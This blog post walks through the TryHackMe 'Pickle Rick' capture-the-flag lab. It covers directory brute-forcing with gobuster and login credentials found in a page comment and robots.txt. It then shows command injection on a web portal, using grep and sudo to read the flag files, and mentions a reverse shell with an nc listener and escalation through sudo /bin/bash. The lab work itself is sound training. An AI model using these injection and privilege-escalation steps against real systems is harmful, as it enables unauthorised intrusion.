TryHackMe(THM) | Pickle Rick(Without Reverse shell)

Connect openVPN, fire up the machine and wait for the IP.
My machine ip was 10.10.81.191

Performing a basic nmap scan tells us that port 22(ssh) and 80(http) are open. I did a detailed scan of these 2 ports but since it's irrelevant for this challenge I'm not including it.
Let's move on to the website and do some basic manual enumerations while letting gobuster do the directory and file bruteforcing in peace!
We see that there are no other links in the website so we check the source, which reveals an interesting comment :

<!--

    Note to self, remember username!

    Username: R1ckRul3s

  -->

We check the robots.txt and interestingly enough, it does exist and has some content : Wubbalubbadubdub
Meanwhile our gobuster scan has also come up with some interesting contents :

┌──(x117㉿kali)-[~]
└─$ gobuster dir -u http://10.10.62.223 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt,zip
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.62.223
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html,txt,zip
[+] Timeout:                 10s
===============================================================
2021/07/11 08:40:59 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 1062]
/login.php            (Status: 200) [Size: 882]
/assets               (Status: 301) [Size: 313] [--> http://10.10.62.223/assets/]
/portal.php           (Status: 302) [Size: 0] [--> /login.php]
/robots.txt           (Status: 200) [Size: 17]
Progress: 28200 / 438325 (6.43%)                                                ^C
[!] Keyboard interrupt detected, terminating.

===============================================================
2021/07/11 08:49:19 Finished
===============================================================

Let's move on to http://10.10.81.191/login.php. It's a login page which requires you to put in the credentials of username and password. From the comment, it's clear that the username is R1ckRul3s and the password should be what we got in the robots.txt file i.e Wubbalubbadubdub. (How did I guess? Because it's not a real life scenario and that's the difference between a THM or HTB room or a CTF and real life hacking... here, you always have the answer!!)

After logging in we are redirected to http://10.10.81.191/portal.php. Which looks like a very ideal place to perform command injection!

Let's start with the standard whoami :
www-data
Let's view the contents of the directory, in which we are currently :

ls

Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt

I think we have the 1st ingredient, so let's cat it out :

cat Sup3rS3cretPickl3Ingred.txt

...but

Command disabled to make it hard for future PICKLEEEE RICCCKKKK.

What about

grep . Sup3rS3cretPickl3Ingred.txt

(Basically we are using regular expression to grep out the contents of the file. . replaces any one character, so if there is any character in any of the lines, the line will be printed, in other words, we are printing out the contents of the whole file!)

<censored first ingredient>

That, ladies and gentlemen, is the 1st flag.
I did some more basic enumeration. Ran sudo -l and realised I had access to all commands without password. I checked the home directory.

ls /home

rick
ubuntu

Let's view the files of rick

ls /home/rick

second ingredients

There's some hope...

grep . '/home/rick/second ingredients'

<censored second ingredient>

...And BAM!! Second ingredient found!
So we found the 1st ingredient under www-data, second one under rick. Proceeding on that line, I think we have to check the /root folder.

ls /root

<No response>

Probably we don't have the permissions. But since we can run all commands as root, as we checked earlier...

sudo ls /root

3rd.txt
snap

sudo grep . /root/3rd.txt

3rd ingredients: <censored third ingredient>

That's it! The third ingredient.
In case you're looking for a cooler solution, since you can run any commands you can try and obtain a reverse-shell, using any command from the pentestmonkey reverse-shell cheat-sheet, running a listener in your own machine using nc -lnvp <port number> and feeding your own ip and port-number in the payload(When I say, your own ip, I mean your machine ip in THM, in this case). You'll obtain a reverse shell and you can run the earlier commands.
Not cool enough? Try escalating your privileges by running sudo /bin/bash and then view the final 3rd.txt!!

A bug that made me a better developer.

How to build powerful tables in React using the React Table package

Implementing tables using reactjs

Next.js Authentication with Netlify Identity

Using VueQuill editor in Vue.Js3

Websites To Learn Programming For Free

C# For Beginners - Lesson 6: Strings

NodeJS vs Python

TryHackMe(THM) | Pickle Rick(Without Reverse shell)

Related Posts